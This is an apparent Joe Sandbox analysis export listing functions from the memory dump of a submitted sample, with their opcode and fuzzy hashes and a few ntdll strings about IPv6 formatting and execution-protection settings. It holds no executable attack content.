Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: 2a9306b5aec819bd018e4ef96ff52364f5ea10c2f5243935bb0c323cb864f295
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: 5FD0A972604620ABDB32AA1CFC04FD333E9BB88B20F060459F008C7150C360EC81CA84

Function 01AEE908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: ba899a90a7f3cc9de1440b29adf003345a621e1f530aa4c79736f9bb5afc129e
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: C9E0EC759506849BDF12EF59DA44F5ABBF9BB94B40F150054E1089B660C624E900CB40

Function 01A6A0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: 497cbbc87267b2502f6f052fdb5f4f51671cd2c782bb7dfd38727ab1b89b0cf5
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 01D0127231607197DF29A7556914F677959AF81EA4F1A006D790AA3900C5158C42D6E0

Function 01AAA830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: b682ea757456c1d2b24642c95f84f794d78585f8f7c37fafe624f407231098c3
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: C1D012771D054DBBCB11AF66DD01FA57BA9EB64BA0F444020B504875A0C63AE950D584

Function 01AACA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71de751bee41ca5e9bcf2fcb86751e1e31bd905d94586767b34f459e9930fe88
Instruction ID: 967ad3417e1cd435421850ed973322e179b327df32ea0f4e69a0834dd066c6de
Opcode Fuzzy Hash: 71de751bee41ca5e9bcf2fcb86751e1e31bd905d94586767b34f459e9930fe88
Instruction Fuzzy Hash: CFD0C775555501DBEF16DF59C628D7E77B5FF14650F84006CE70153525D32DDC01C650

Function 01A802A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: 7c1266fdf2c83ec618b8a177448d6835da29d6770d2e296d9cf666e0b1168f62
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: F8D0C935312E80CFD71BCB0CC6A4B1533B4BB44B44F850490F542CBB62E67CD944CA00

Function 01AAC700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 4568b3ae1dcfb236a31a9495ffab4da25b428e940ebec6360221bda133a2f3de
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 2CC01272290648AFCB12AA99CE01F127BA9EBA8B40F000021F2048B670C631E820EA84

Function 01A90310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: e6c0dee3bbf4d7341251c00f5ea8f830a56a361a12416342f03a67499a73ce3b
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: B6D01236100248EFCB01DF41C990D9B776EFBD8750F509019FD19076108A31ED62DA50

Function 01A70750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: f30f3d481ed8ccf552cc0f3223742ec020e7491c890e87014dd54b7b308e35c6
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: FCC04879701A428FCF16EF2AD394F597BE4FB44B40F164890E805CBB22E724F805CA10

Function 01AB4340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7e857cdc8a64b8fa2aa33ea221d2807c8d138da1a0be7928fa65667618e33f9
Instruction ID: 87ee7eaa2dff778f853ce08cf3332240d3d4aafdfb9bd8bc4b15cd73c35514bd
Opcode Fuzzy Hash: e7e857cdc8a64b8fa2aa33ea221d2807c8d138da1a0be7928fa65667618e33f9
Instruction Fuzzy Hash: 06900231605800129140715D48845464005B7E0701F56C015E0424554CCA198A565361

Function 01AB4650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97345c6fd953c675e77c0948eadad4f4b9a2bd21c419e1c7687a80f94c93bb9a
Instruction ID: 9e9e2d9920bc95b8d2fdf378585a9d72f0303ea0bd4aa5bd8652d0618673e4a6
Opcode Fuzzy Hash: 97345c6fd953c675e77c0948eadad4f4b9a2bd21c419e1c7687a80f94c93bb9a
Instruction Fuzzy Hash: 07900471701500434140715D4C044077005F7F17017D7C11DF0554570CC71DCD55D37D

Function 01AB2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2360a288dc1005b8300d45482758ed63e986adc71ce8a7ff338d1ed99046607c
Instruction ID: 49b0045ebb5a1ca5f4aca07a5ac8069de1b3efdbc3a72526d79eeaa02a9d0bf8
Opcode Fuzzy Hash: 2360a288dc1005b8300d45482758ed63e986adc71ce8a7ff338d1ed99046607c
Instruction Fuzzy Hash: 5590023160540802D150715D44147460005A7D0701F56C015A0024654DC75A8B5577A1

Function 01AB2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f45022e021a0feea6c605096b57ce2d55b4221fd213d6a4d6a1997ca347f745
Instruction ID: d2c10b5b0d01e40f5775a69c5f76468f2a4ee094a5f9f1dfb0fb76e2a7a157e2
Opcode Fuzzy Hash: 0f45022e021a0feea6c605096b57ce2d55b4221fd213d6a4d6a1997ca347f745
Instruction Fuzzy Hash: 4690023120140802D104715D48046860005A7D0701F56C015A6024655ED66A89917231

Function 01AB2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b580ef544973dfc29d1139275ad0a01ec40c6f76737ce63a77a60330f21b68
Instruction ID: e34f4db42a5210c6c33a44573b1c6af1afbae3d9ba9c1839154d458ba8bf5b80
Opcode Fuzzy Hash: c1b580ef544973dfc29d1139275ad0a01ec40c6f76737ce63a77a60330f21b68
Instruction Fuzzy Hash: F990023120544842D140715D4404A460015A7D0705F56C015A0064694DD62A8E55B761

Function 01AB2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7e5d33e2fa3d6f3a74e0bc550cbbdfaa9db7d05ac73e6d5c4149a2c8c57a05
Instruction ID: e72fef7972036f56fd9d7c413b2ab50622e4ad3317690ff4f02948dd98dc3f87
Opcode Fuzzy Hash: 6e7e5d33e2fa3d6f3a74e0bc550cbbdfaa9db7d05ac73e6d5c4149a2c8c57a05
Instruction Fuzzy Hash: C59002A1201540924500B25D8404B0A4505A7E0601F56C01AE1054560CC52A89519235

Function 01AB2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19d010be7a34e397f8064cd7b6abe795af2fbf7f0df68b7ffcd0c29bf277307c
Instruction ID: db69ea9effaec0feaac94c0fe28bad9ea077f0926e76d9db2681e732ce10b181
Opcode Fuzzy Hash: 19d010be7a34e397f8064cd7b6abe795af2fbf7f0df68b7ffcd0c29bf277307c
Instruction Fuzzy Hash: 5C900225221400020145B55D060450B0445B7D6751796C019F1416590CC62689655321

Function 01AB2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c06f40fa62a13099ac3596f8b200b22d4661542ae41034c11cd40da1f52774ce
Instruction ID: 593ddf294a8b3203293f293e308b62131c4a9252d75a2ce8f0987b69b232ba77
Opcode Fuzzy Hash: c06f40fa62a13099ac3596f8b200b22d4661542ae41034c11cd40da1f52774ce
Instruction Fuzzy Hash: 6C90023124140402D141715D44046060009B7D0641F96C016A0424554EC65A8B56AB61

Function 01AB2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a68ac3dc96b1cdb4ed5d07aa39fb70d3e19f4deed8f804a42a713cc8c0bf15
Instruction ID: 7d75b7a80a3e13064fea3f41412a3fc4a6427847f2a15d2cccf8b01e83e725ed
Opcode Fuzzy Hash: 99a68ac3dc96b1cdb4ed5d07aa39fb70d3e19f4deed8f804a42a713cc8c0bf15
Instruction Fuzzy Hash: A490022120544442D100755D5408A060005A7D0605F56D015A1064595DC63A8951A231

Function 01AB2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b573870b87fd77880dce9e574160cc70bfe3780598164de082ba31fbc4bf7d9
Instruction ID: d339efabd54cdc54e431f49c4d49dbdaa96e5450dd321ddd29f251678e55aa08
Opcode Fuzzy Hash: 2b573870b87fd77880dce9e574160cc70bfe3780598164de082ba31fbc4bf7d9
Instruction Fuzzy Hash: 9890043130140403D100715D550C7070005F7D0701F57D415F043455CDD75FCD517331

Function 01AB2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab9164ecfe46a8ef313bb8d13108fcc41fa58cb94cfd48e71ab7574ab781c75
Instruction ID: b9766704f9d4f46d1958025c97160873620290f9f4d4fdf76704e250ddae67e6
Opcode Fuzzy Hash: 6ab9164ecfe46a8ef313bb8d13108fcc41fa58cb94cfd48e71ab7574ab781c75
Instruction Fuzzy Hash: 8490022160540402D140715D54187060015A7D0601F56D015A0024554DC65E8B5567A1

Function 01AB2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782b3c51bc257a081c6bd944fb447f4f36d91f07c3bd0a447c2678253cd632e5
Instruction ID: 19a466b80471834093ad44d36363a52379279312a7d3ab6692f5899b0001bc9d
Opcode Fuzzy Hash: 782b3c51bc257a081c6bd944fb447f4f36d91f07c3bd0a447c2678253cd632e5
Instruction Fuzzy Hash: 2F90023120140842D100715D4404B460005A7E0701F56C01AA0124654DC61AC9517621

Function 01AB2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d067f13f2db7e8efa9778cbaf3a2ba71509fb852a5c533d0086d41d9a575b87e
Instruction ID: c4d2d0b2fb4f30de4a1e43a71d7c61af3deafdc881f850a4a1e7a0e432df9684
Opcode Fuzzy Hash: d067f13f2db7e8efa9778cbaf3a2ba71509fb852a5c533d0086d41d9a575b87e
Instruction Fuzzy Hash: 2990023120180402D100715D48087470005A7D0702F56C015A5164555EC66AC9916631

Function 01AB2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c77962ced5d37e265a22382c43cff3157e14f5c583d70b81a993d4db9ea48af5
Instruction ID: d7f2400b91a59a8118278ee294407f29d26c34e8a0ef2bb4cd2227f45d5d0319
Opcode Fuzzy Hash: c77962ced5d37e265a22382c43cff3157e14f5c583d70b81a993d4db9ea48af5
Instruction Fuzzy Hash: 8790047131140043D104715D44047070045F7F1701F57C017F3154554CC53FCD715335

Function 01AB2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142047b88c286622bd669308706f9732ef7ce5118aea02cc3f7a973493c8d3eb
Instruction ID: 6187b97e11bd308e1ae4b02c820e4ffbe667c08d3a06386bb102128b7cd1237a
Opcode Fuzzy Hash: 142047b88c286622bd669308706f9732ef7ce5118aea02cc3f7a973493c8d3eb
Instruction Fuzzy Hash: D790026120180403D140755D48046070005A7D0702F56C015A2064555ECA2E8D516235

Function 01AB2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829f0baa49125b68023a36959213ee85afa36a0db4b41ef0e60777d07b765151
Instruction ID: 5e1c152fbdaa661598f8c64f0b76989c7079f4c82cddd7e6f7b547b46071cde3
Opcode Fuzzy Hash: 829f0baa49125b68023a36959213ee85afa36a0db4b41ef0e60777d07b765151
Instruction Fuzzy Hash: 9190022130140402D102715D44146060009E7D1745F96C016E1424555DC62A8A53A232

Function 01AB3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8649280ae6ad23cf209ea3ed50e69a656d5b435760a75a443c6d6fdb6cab3f
Instruction ID: d0928c43e18257f3376b49bcecd817f9e9100c6b39e7dee517263bf39ef30503
Opcode Fuzzy Hash: 6e8649280ae6ad23cf209ea3ed50e69a656d5b435760a75a443c6d6fdb6cab3f
Instruction Fuzzy Hash: 9E90022124140802D140715D84147070006E7D0A01F56C015A0024554DC61B8A6567B1

Function 01AB3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7077a6523dff224adeb29ce73fd25a6cc0e45c2f71cefbecd76b3c9103dae9e6
Instruction ID: 5b612d98117bd1582f6a64168e0bfdd49d0e1d7fb38be5e19cf1b39f1ec32164
Opcode Fuzzy Hash: 7077a6523dff224adeb29ce73fd25a6cc0e45c2f71cefbecd76b3c9103dae9e6
Instruction Fuzzy Hash: 4E90022120184442D140725D4804B0F4105A7E1602F96C01DA4156554CC91A89555721

Function 01AB35C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3a6996cd08fc2c23b4cf88d4adf83e75f87fa1524584cb291ab0dca3aa63ce
Instruction ID: 5809e4ae67bc3cd04fe9351bf30e0f34bffffd8df3977115b2caebf53d915177
Opcode Fuzzy Hash: 3d3a6996cd08fc2c23b4cf88d4adf83e75f87fa1524584cb291ab0dca3aa63ce
Instruction Fuzzy Hash: 1690023160550402D100715D45147061005A7D0601F66C415A0424568DC79A8A5166A2

Function 01AB39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3efed96714ee9913bda4e86bf62965ebe1b0eefe78f2adeee0207317420fdf92
Instruction ID: ab7d8ccb95b26425803193a59cfbf6864f993ef50171bc0a503e9d5f43cd5fd9
Opcode Fuzzy Hash: 3efed96714ee9913bda4e86bf62965ebe1b0eefe78f2adeee0207317420fdf92
Instruction Fuzzy Hash: D290043134545103D150715D44047174005F7F0701F57C035F0C145D4DC55FCD557331

Function 01AB3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f4f29460e1292743a0adda20736dd83ba8d033a7dcb43424f7c8ca95735ceb2
Instruction ID: b7a2b48dfcfb4514b91ef6262c3af96033c21de186659989cbf7c40a26acfd97
Opcode Fuzzy Hash: 8f4f29460e1292743a0adda20736dd83ba8d033a7dcb43424f7c8ca95735ceb2
Instruction Fuzzy Hash: 6F900231202401429540725D5804A4E4105A7E1702F96D419A0015554CC91989615321

Function 01AB3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef36ffc10e4c0270fefcfe3e6cf94b31ca01a791aa5bbac5c1d15b3c22040d1
Instruction ID: c60c09bb47ab66427aa131e2ceeaf8ed92823e8483d46562e579fa15fd2aea65
Opcode Fuzzy Hash: bef36ffc10e4c0270fefcfe3e6cf94b31ca01a791aa5bbac5c1d15b3c22040d1
Instruction Fuzzy Hash: 3290023520140402D510715D58046460046A7D0701F56D415A0424558DC65989A1A221

Function 01AB2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 9f61412f11b5e3ee762173fdc8b263ec46ac6eb5781609148b05bfd32178cb6c
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01AB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01AB293C
___swprintf_l.LIBCMT ref: 01AB295E
___swprintf_l.LIBCMT ref: 01AB29A3
___swprintf_l.LIBCMT ref: 01AEA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 01AEA54E
ffff:, xrefs: 01AEA504
::%hs%u.%u.%u.%u, xrefs: 01AEA527
:%u.%u.%u.%u, xrefs: 01AEA5B8

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f5fb260f98c416fc21e9ff583c9dc4669bc1b15f89f3f3e2f17d65eccdc68047
Instruction ID: 176c8414c5c86552b5e4d69a60ebb27f848937522e0d8a9cc6facd6d8b07a119
Opcode Fuzzy Hash: f5fb260f98c416fc21e9ff583c9dc4669bc1b15f89f3f3e2f17d65eccdc68047
Instruction Fuzzy Hash: 7F51D8B5A00156BFDB11DBAC89D4ABEFBFCBB48240714816BE469D7642D334EE4087E0

Function 01B22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B224A6
___swprintf_l.LIBCMT ref: 01B224E2
___swprintf_l.LIBCMT ref: 01B2257D
___swprintf_l.LIBCMT ref: 01B225A3
___swprintf_l.LIBCMT ref: 01B225C8
___swprintf_l.LIBCMT ref: 01B22608

Strings

:%u.%u.%u.%u, xrefs: 01B225FF
::ffff:0:%u.%u.%u.%u, xrefs: 01B224DA
ffff:, xrefs: 01B2247D, 01B2249D
::%hs%u.%u.%u.%u, xrefs: 01B2249E

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 8bac57ff7b3211495866b31ff1263f5c7b7d5b332a1a06f4007055361043200c
Instruction ID: ee410cdbca0a54d02ad297be3e79386f28fdb953c853f3f42445e4a01ec7e4c1
Opcode Fuzzy Hash: 8bac57ff7b3211495866b31ff1263f5c7b7d5b332a1a06f4007055361043200c
Instruction Fuzzy Hash: 72510575A00665AFDF39DE9CC99087EBBF8EF44200B04C4D9E5AAC7641E774DA44C760

Function 01AA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01AE46FC
Execute=1, xrefs: 01AE4713
ExecuteOptions, xrefs: 01AE46A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 01AE4787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01AE4725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01AE4742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01AE4655

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
